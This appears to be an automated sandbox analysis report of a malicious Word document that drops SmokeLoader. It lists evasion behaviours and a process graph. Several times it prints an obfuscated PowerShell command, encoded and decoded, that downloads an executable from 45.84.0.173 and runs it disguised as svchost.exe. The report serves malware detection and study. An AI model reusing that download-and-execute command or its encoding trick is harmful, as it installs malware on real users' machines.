Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3147 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 459 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1290 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4270 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 288 Thread sleep count: 3147 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 288 Thread sleep count: 459 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3080 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2424 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116 Thread sleep count: 1290 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116 Thread sleep count: 4270 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3156 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3160 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3096 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 7_2_0022092B mov eax, dword ptr fs:[00000030h] 7_2_0022092B
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 7_2_00220D90 mov eax, dword ptr fs:[00000030h] 7_2_00220D90
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 7_2_0244B7E8 push dword ptr fs:[00000030h] 7_2_0244B7E8
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: powershell.exe PID: 1432, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3084, type: MEMORYSTR
Encrypted powershell cmdline option found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded $Web = New-Object System.Net.WebClient; $Url = 'http://45.84.0.173/download_22/server.exe'; $Pth = "$env:Temp\svchost.exe"; $Web.DownloadFile($Url, $Pth); Invoke-Expression $Pth;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C; Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded $Web = New-Object System.Net.WebClient; $Url = 'http://45.84.0.173/download_22/server.exe'; $Pth = "$env:Temp\svchost.exe"; $Web.DownloadFile($Url, $Pth); Invoke-Expression $Pth; Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 3 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C; Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA= Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c $b = [text.encoding]::utf8.getstring([convert]::frombase64string('jfdlyia9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7icrvcmwgpsanahr0cdovlzq1ljg0ljaumtczl2rvd25sb2fkxziyl3nlcnzlci5legunoyakuhroid0giirlbny6vgvtcfxzdmnob3n0lmv4zsi7icrxzwiurg93bmxvywrgawxlkcrvcmwsicrqdggpoybjbnzva2utrxhwcmvzc2lvbiakuhroow==')); $c = [convert]::tobase64string([text.encoding]::unicode.getbytes($b)); powershell -e $c;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -e jabxaguaygagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0adsaiaakafuacgbsacaapqagaccaaab0ahqacaa6ac8alwa0adualga4adqalgawac4amqa3admalwbkag8adwbuagwabwbhagqaxwayadialwbzaguacgb2aguacgauaguaeablaccaowagacqauab0aggaiaa9acaaigakaguabgb2adoavablag0acabcahmadgbjaggabwbzahqalgblahgazqaiadsaiaakafcazqbiac4arabvahcabgbsag8ayqbkaeyaaqbsaguakaakafuacgbsacwaiaakafaadaboackaowagaekabgb2ag8aawblac0arqb4ahaacgblahmacwbpag8abgagacqauab0aggaowa=
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c $b = [text.encoding]::utf8.getstring([convert]::frombase64string('jfdlyia9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7icrvcmwgpsanahr0cdovlzq1ljg0ljaumtczl2rvd25sb2fkxziyl3nlcnzlci5legunoyakuhroid0giirlbny6vgvtcfxzdmnob3n0lmv4zsi7icrxzwiurg93bmxvywrgawxlkcrvcmwsicrqdggpoybjbnzva2utrxhwcmvzc2lvbiakuhroow==')); $c = [convert]::tobase64string([text.encoding]::unicode.getbytes($b)); powershell -e $c; Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -e jabxaguaygagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0adsaiaakafuacgbsacaapqagaccaaab0ahqacaa6ac8alwa0adualga4adqalgawac4amqa3admalwbkag8adwbuagwabwbhagqaxwayadialwbzaguacgb2aguacgauaguaeablaccaowagacqauab0aggaiaa9acaaigakaguabgb2adoavablag0acabcahmadgbjaggabwbzahqalgblahgazqaiadsaiaakafcazqbiac4arabvahcabgbsag8ayqbkaeyaaqbsaguakaakafuacgbsacwaiaakafaadaboackaowagaekabgb2ag8aawblac0arqb4ahaacgblahmacwbpag8abgagacqauab0aggaowa= Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 7_2_0040512A GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 7_2_0040512A

Stealing of Sensitive Information
barindex
Yara detected SmokeLoader
Source: Yara match File source: 7.2.svchost.exe.220e67.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality
barindex
Yara detected SmokeLoader
Source: Yara match File source: 7.2.svchost.exe.220e67.0.raw.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1446716 Sample: 472.rtf.doc Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 40 Malicious sample detected (through community Yara rule) 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 Yara detected SmokeLoader 2->44 46 14 other signatures 2->46 9 WINWORD.EXE 303 24 2->9         started        process3 file4 30 C:\Users\user\...\~DFF8D2936508DC487F.TMP, Composite 9->30 dropped 52 Suspicious command line found 9->52 13 cmd.exe 9->13         started        signatures5 process6 signatures7 54 Suspicious powershell command line found 13->54 56 Encrypted powershell cmdline option found 13->56 16 powershell.exe 4 13->16         started        19 timeout.exe 13->19         started        process8 signatures9 34 Encrypted powershell cmdline option found 16->34 36 Drops PE files with benign system names 16->36 38 Powershell drops PE file 16->38 21 powershell.exe 12 6 16->21         started        process10 dnsIp11 32 45.84.0.173, 49161, 80 ALEXHOSTMD Russian Federation 21->32 28 C:\Users\user\AppData\Local\...\svchost.exe, PE32 21->28 dropped 25 svchost.exe 21->25         started        file12 process13 signatures14 48 Antivirus detection for dropped file 25->48 50 Multi AV Scanner detection for dropped file 25->50
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.84.0.173
 unknown Russian Federation
200019 ALEXHOSTMD false

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://45.84.0.173/download_22/server.exe false
  • Avira URL Cloud: safe
 unknown